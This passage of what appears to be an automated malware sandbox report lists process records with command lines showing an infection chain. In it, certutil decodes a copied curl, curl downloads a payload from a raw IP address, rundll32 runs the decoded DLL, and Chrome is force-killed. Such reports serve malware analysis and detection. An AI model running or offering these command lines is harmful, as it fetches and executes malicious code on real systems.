    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:30
    Start time:09:58:42
    Start date:22/07/2024
    Path:C:\Windows\SysWOW64\xcopy.exe
    Wow64 process (32bit):true
    Commandline:xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
    Imagebase:0x430000
    File size:43'520 bytes
    MD5 hash:7E9B7CE496D09F70C072930940F9F02C
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:31
    Start time:09:58:42
    Start date:22/07/2024
    Path:C:\Windows\SysWOW64\certutil.exe
    Wow64 process (32bit):true
    Commandline:certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
    Imagebase:0x340000
    File size:1'277'440 bytes
    MD5 hash:0DDA4F16AE041578B4E250AE12E06EB1
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:32
    Start time:09:58:43
    Start date:22/07/2024
    Path:C:\Windows\SysWOW64\certutil.exe
    Wow64 process (32bit):true
    Commandline:certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
    Imagebase:0x340000
    File size:1'277'440 bytes
    MD5 hash:0DDA4F16AE041578B4E250AE12E06EB1
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:33
    Start time:09:58:43
    Start date:22/07/2024
    Path:C:\Users\user\AppData\Local\Temp\curl.exe
    Wow64 process (32bit):true
    Commandline:C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
    Imagebase:0x830000
    File size:470'528 bytes
    MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:34
    Start time:09:58:46
    Start date:22/07/2024
    Path:C:\Windows\SysWOW64\certutil.exe
    Wow64 process (32bit):true
    Commandline:certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
    Imagebase:0x340000
    File size:1'277'440 bytes
    MD5 hash:0DDA4F16AE041578B4E250AE12E06EB1
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:35
    Start time:09:58:47
    Start date:22/07/2024
    Path:C:\Windows\SysWOW64\rundll32.exe
    Wow64 process (32bit):true
    Commandline:rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
    Imagebase:0xfc0000
    File size:61'440 bytes
    MD5 hash:889B99C52A60DD49227C5E485A016679
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:36
    Start time:09:58:47
    Start date:22/07/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
    Imagebase:0x7ff7868b0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:37
    Start time:09:58:47
    Start date:22/07/2024
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
    Imagebase:0x7ff7a6040000
    File size:289'792 bytes
    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:38
    Start time:09:58:47
    Start date:22/07/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff66e660000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:39
    Start time:09:58:47
    Start date:22/07/2024
    Path:C:\Windows\System32\taskkill.exe
    Wow64 process (32bit):false
    Commandline:taskkill /F /IM chrome.exe
    Imagebase:0x7ff6956e0000
    File size:101'376 bytes
    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    No disassembly